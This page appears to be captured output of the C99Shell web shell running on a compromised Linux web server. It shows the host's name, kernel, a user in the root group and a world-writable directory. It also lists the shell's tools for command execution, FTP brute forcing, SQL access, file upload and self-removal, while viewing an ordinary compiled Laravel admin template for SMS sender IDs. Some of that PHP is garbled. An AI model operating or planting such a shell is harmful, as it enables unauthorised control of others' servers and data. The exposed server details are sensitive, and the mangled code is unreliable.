!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/storage/framework/views/   drwxrwxrwx
Free 28.36 GB of 117.98 GB (24.04%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     124b59c165b9705a49cbbe9d250e48f9.php (5.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php $__env->startSection('title'); ?>
    <?php echo e(trans('admin.assign_sender_id')); ?>

<?php $__env->stopSection(); ?>

<?php $__env->startSection('extra-css'); ?>
    <link rel="stylesheet" href="<?php echo e(asset('plugins/datatables-bs4/css/dataTables.bootstrap4.min.css')); ?>">
    <link rel="stylesheet" href="<?php echo e(asset('plugins/datatables-responsive/css/responsive.bootstrap4.min.css')); ?>">
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
    <!-- Main content -->
    <section class="content">
        <div class="row">
            <div class="col-12">
                <div class="card">
                    <div class="card-header">
                        <h2 class="card-title"><?php echo e(trans('admin.assign_sender_id')); ?></h2>
                    </div>
                    <!-- /.card-header -->
                    <div class="card-body table-body">
                        <form action="<?php echo e(route('admin.customer.save.assign.senderid')); ?>" method="post">
                            <?php echo csrf_field(); ?>
                            <div class="row">
                                <div class="col-md-6">
                                    <label for="">Customers</label>
                                    <select name="customer_id" class="form-control select2" id="">
                                        <?php if($customers->isNotEmpty()): ?>
                                            <?php $__currentLoopData $customers$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $customer): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                                <option value="<?php echo e($customer->id); ?>"><?php echo e($customer->email); ?></option>
                                            <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                                        <?php else: ?>
                                            <option value=""><?php echo e(trans('--No Data Available--')); ?></option>
                                        <?php endif; ?>
                                    </select>
                                </div>
                                <div class="col-md-6">
                                    <label for=""><?php echo e(trans('admin.gateway')); ?></label>
                                    <select name="dynamic_gateway_id" class="form-control select2" >
                                        <?php $__currentLoopData $availableSMSGateway$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $gateway): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                            <option
                                                value="<?php echo e($gateway->id); ?>"><?php echo e($gateway->name); ?></option>
                                        <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                                    </select>
                                    <small>
                                        <?php echo e(trans('admin.sender_id_configure')); ?>

                                        <a class="text-danger" target="_blank" href="<?php echo e(route('admin.gateway.index')); ?>"><b>click here <i class="fas fa-external-link-alt"></i></b></a></small>
                                </div>

                                <div class="col-md-6 mt-3">
                                    <label for=""><?php echo e(trans('admin.sender_id')); ?></label>
                                    <input type="text" class="form-control" name="sender_id"
                                           placeholder="<?php echo e(trans('admin.enter_sender_id')); ?>">
                                </div>

                                <div class="col-md-6 mt-3">
                                    <label for=""><?php echo e(trans('admin.expire_date')); ?></label>
                                    <input type="date" value="<?php echo e(now()->addMonth()->toDateString()); ?>" name="expire_date"
                                           class="form-control" placeholder="<?php echo e(trans('admin.enter_expire_date')); ?>">
                                </div>

                                <div class="col-md-12 mt-3">
                                    <button class="btn btn-primary" type="submit">
                                        <?php echo e(trans('admin.submit')); ?>

                                    </button>
                                </div>

                            </div>

                        </form>
                    </div>
                    <!-- /.card-body -->
                </div>
                <!-- /.card -->
            </div>
            <!-- /.col -->
        </div>
        <!-- /.row -->
    </section>
    <!-- /.content -->

<?php $__env->stopSection(); ?>

<?php $__env->startSection('extra-scripts'); ?>
    <script>
        "use strict";
        $('.select2').select2({
            multiple: false
        });
    </script>
<?php $__env->stopSection(); ?>


<?php echo $__env->make('layouts.admin'\Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH /home/picotech/domains/sms.picotech.app/public_html/resources/views/admin/customers/assign_senderid.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--